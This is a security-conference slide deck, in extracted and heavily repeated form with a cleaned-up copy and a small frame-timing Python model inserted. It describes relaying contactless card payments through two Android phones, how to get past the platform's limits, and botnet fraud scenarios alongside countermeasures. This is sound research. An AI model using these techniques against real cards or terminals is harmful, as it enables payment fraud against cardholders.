P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36


Related Work: On relay attacks

- 2005-2009: First works built on specific hardware
- 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
- 2012-2013: Relay attacks on Android accessing Secure Elements. A SE securely stores data associated with credit/debit cards. Needs a non-OTS Android device
- 2014: Active relay attacks with custom hardware and custom Android firmware
- Several works studied the delay over the relay channel: relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide.


Conclusions (I)

- Security of NFC is based on the physical proximity concern
- NFC threats: eavesdropping, data modification, relay attacks
- Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity

Conclusions:

- Review of the Android NFC stack
- Proof-of-Concept of relay attacks using Android OTS devices
- Threat scenarios introduced
- Virtual pickpocketing attacks may appear before long


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work:

- Develop a botnet infrastructure and earn money
- Timing constraints of Android HCE mode
- Try active relay attacks within EMV contactless cards

Acknowledgments:

- Spanish National Cybersecurity Institute (INCIBE)
- University of León under contract X43
- HITB staff

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project.


Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?

- Amount limit on a single transaction: up to £20 GBP, 20€, US$50, 50 CHF, CAD$100 or AUD$100
- cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
- Sequential contactless payments limited – it asks for the PIN
- Protected by the same fraud guarantee as standard transactions (hopefully)


Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)

Mafia frauds – Y. Desmedt (SecuriCom'88)

[Figure: P ⟶ V̄ ··· communication link ··· P̄ ⟶ V]

Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate.

- Honest prover and verifier: contactless card and Point-of-Sale terminal
- Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I): Recap on evolution of Android NFC support

[Figure: timeline of NFC operation modes supported and tag technology classes added per Android release]

- Android 2.3.3 Gingerbread (API level 10): Ndef, NdefFormatable, MifareClassic, MifareUltralight, NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), NfcF (JIS 6319-4). Operation modes: Reader/Writer and Peer-to-peer in software; Card-emulation in hardware only
- Android CyanogenMod OS 9.1 (thanks to Doug Yeager): IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
- Android 4.2 Jelly Bean (API level 17): NfcBarcode
- Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added. Operation modes: Reader/Writer, Peer-to-peer and Card-emulation in software, plus Card-emulation in hardware

Android and NFC: A Tale of L♥ve (II): Digging into the Android NFC stack

- Event-driven framework, nice API support
- Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
- NXP dropped in favour of NCI: open architecture, not focused on a single chip family; open interface between the NFC Controller and the DH (Device Host); standard proposed by the NFC Forum


Android and NFC: A Tale of L♥ve (III): Digging into the Android NFC stack – Reader/Writer mode

- Not allowed to be set directly → Android activity
- The Android NFC service selects apps according to the tag definition in the Manifest file
- At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI): makes communication between layers and modules easier

[Figure: transceive call path. User App → NFC developer framework: Tag → NfcService (mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI (doTransceive) → System NFC library: NativeNfcTag.cpp → libnfc-nci]

Android and NFC: A Tale of L♥ve (IV): Digging into the Android NFC stack – HCE mode

- A service must be implemented to process commands and replies: HostApduService abstract class and processCommandApdu method
- AID-based routing service table: this means you need to declare in advance which AID you handle

Android and NFC: A Tale of L♥ve (V): Digging into the Android NFC stack – Summary

Description                                        | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package)  | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)      | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                          | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)   | ARM Thumb   | Hardware and manufacturer | No

Some useful links:

- https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
- https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
- https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
- https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
- http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
- http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
- http://www.datasheet4u.com/PDF/845670/BCM20793S.html
- http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI): Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic

- libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands: caused by the CRC computation performed by the NFCC
- Overcome if the NFCC is modified
- EMV contactless cards are IsoDep: fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier

- Device in HCE mode: the AID must be known in advance
- Overcome if the device is rooted: the Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V): Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel

ISO/IEC 14443-4 defines the Frame Waiting Time as

  FWT = 256 · (16 / fc) · 2^FWI,  0 ≤ FWI ≤ 14,  where fc = 13.56 MHz

FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding Remarks:

- Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
- Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice.
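A small Python model of the FWT budget from the formula above, added here as an example and not part of the original slides. It also models the timing extension commands the slides mention: under ISO/IEC 14443-4 a card may request S(WTX) with a multiplier WTXM in 1..59, which is background knowledge assumed here, as are the helper and parameter names. The reader-side check is the defender's view: a relay channel faster than the (possibly extended) budget passes the plain FWT timeout unnoticed.

```python
"""Frame Waiting Time budget (added example, not the authors' code).

FWT = 256 * (16 / fc) * 2**FWI, 0 <= FWI <= 14, fc = 13.56 MHz (from the slide).
S(WTX): temporary budget FWT * WTXM with 1 <= WTXM <= 59 (ISO/IEC 14443-4
background knowledge assumed here, not stated on the slides).
"""
from typing import List, Optional, Tuple

FC_HZ = 13.56e6   # carrier frequency fc
FWI_MAX = 14      # largest Frame Waiting Integer the standard allows
WTXM_MAX = 59     # largest S(WTX) multiplier (assumed from the standard)


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time for a given FWI, in seconds."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_table() -> List[Tuple[int, float]]:
    """(FWI, FWT in seconds) for every allowed FWI; FWI=0 gives about 302 us."""
    return [(fwi, fwt_seconds(fwi)) for fwi in range(FWI_MAX + 1)]


def extended_fwt_seconds(fwi: int, wtxm: int) -> float:
    """Temporary budget after an S(WTX) request carrying multiplier WTXM."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM must be in 1..59")
    return fwt_seconds(fwi) * wtxm


def relay_fits(delay_s: float, fwi: int, wtxm: int = 1) -> bool:
    """True when a round-trip delay stays within the (possibly extended) budget.

    This is what a reader's timeout actually enforces: only a response later
    than the budget is rejected, so the timeout alone is not a relay detector.
    """
    return delay_s <= extended_fwt_seconds(fwi, wtxm)


def min_fwi_for_delay(delay_s: float) -> Optional[int]:
    """Smallest FWI whose FWT covers delay_s, or None if even FWI=14 does not."""
    for fwi, fwt in fwt_table():
        if delay_s <= fwt:
            return fwi
    return None


if __name__ == "__main__":
    for fwi, fwt in fwt_table():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms")
    # Constructed 500 ms relay round trip: inside the FWI=14 budget,
    # outside FWI=8 unless the card asks for a WTX extension.
    print(relay_fits(0.5, 14), relay_fits(0.5, 8), relay_fits(0.5, 8, wtxm=10))
```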

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 23: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

